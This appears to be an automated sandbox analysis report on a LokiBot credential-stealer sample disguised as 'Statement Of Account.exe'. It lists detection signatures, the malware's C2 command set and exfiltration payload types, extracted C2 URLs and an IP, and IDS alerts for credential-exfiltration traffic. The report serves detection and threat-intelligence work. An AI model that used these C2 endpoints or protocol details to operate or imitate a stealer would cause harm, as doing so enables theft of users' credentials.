Windows Analysis Report
Statement Of Account.exe

Overview

General Information

Sample name: Statement Of Account.exe
Analysis ID: 1543094
MD5: 8d03a09d0f5d5f2c196be0657d169636
SHA1: fb44ba8de7862e644239d29343550eb879b25dd8
SHA256: ac3f8b19b1d29525dddb1d48e4fcf7aec60ea5d93bcf9b874f9a61adde4ca13c
Tags: exeuser-threatcat_ch
Infos:

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Lokibot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Loki Password Stealer (PWS), LokiBot "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
 https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection
barindex
Found malware configuration
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.220/skipo/five/fre.php"]}
Multi AV Scanner detection for domain / URL
Source: 94.156.177.220/skipo/five/fre.php Virustotal: Detection: 18% Perma Link
Source: http://alphastand.trade/alien/fre.php Virustotal: Detection: 15% Perma Link
Source: http://alphastand.win/alien/fre.php Virustotal: Detection: 13% Perma Link
Source: http://kbfvzoboss.bid/alien/fre.php Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for submitted file
Source: Statement Of Account.exe ReversingLabs: Detection: 47%
Source: Statement Of Account.exe Virustotal: Detection: 68% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Statement Of Account.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Statement Of Account.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000000.00000003.2057153434.0000000004320000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076396476.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076232041.0000000004230000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102408875.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102240700.0000000004240000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119966294.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119814778.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2138938581.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2135998807.0000000004250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000000.00000003.2057153434.0000000004320000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076396476.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076232041.0000000004230000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102408875.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102240700.0000000004240000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119966294.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119814778.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2138938581.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2135998807.0000000004250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 0000000A.00000002.3295715813.0000000000121000.00000020.00000001.01000000.00000005.sdmp
Source: Binary string: svchost.pdbUGP source: svchost.exe, 0000000A.00000002.3295715813.0000000000121000.00000020.00000001.01000000.00000005.sdmp
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 3_2_00452126
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 3_2_0045C999
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 3_2_00436ADE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_00434BEE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0045DD7C FindFirstFileW,FindClose, 3_2_0045DD7C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 3_2_0044BD29
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 3_2_00436D2D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_00442E1F
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_00475FE5
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_0044BF8D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 10_2_00403D74

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49755 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49707 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49755
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49706 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49718 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49742 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49706
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49707
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49761 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49708 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49742
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49708
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49761
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49732 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49726 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49798 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49732
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49720
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49821 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49798
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49809 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49809 -> 94.156.177.220:80
